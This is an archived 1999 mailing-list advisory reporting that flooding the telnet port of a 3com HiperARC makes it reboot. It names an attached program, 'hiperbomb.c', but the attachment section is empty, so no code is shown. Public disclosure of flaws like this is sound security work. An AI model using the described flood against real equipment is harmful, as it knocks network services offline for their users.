3com hiperarch flaw [hiperbomb.c]

From: Jonathan Chapman (jchapmanat_private)
Date: Thu Aug 12 1999 - 15:10:44 PDT

    ---254732288-1621199452-934495844=:27775
    Content-Type: TEXT/PLAIN; charset=US-ASCII
    
    Hello,
    
    The attached program will reboot a 3com HiperARC.  I made an attempt to
    contact 3com before posting this report; however, I received no response.
    By flooding the telnet port of a 3com HiperARC using the provided program,
    the HiperARC unconditionally reboots.  This program is effective over all
    interfaces, including a dialup.
    
    Regards,
    
    Jonathan Chapman
    Director of Network Security
    FIRST Incorporated
    jchapmanat_private  www.1st.net
    
    
    ---254732288-1621199452-934495844=:27775
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="hiperbomb.c"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.4.10.9908121810440.27775at_private>
    Content-Description: Reboots HiperARC [kaboom]
    Content-Disposition: attachment; filename="hiperbomb.c"
    
    ---254732288-1621199452-934495844=:27775--
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:56:10 PDT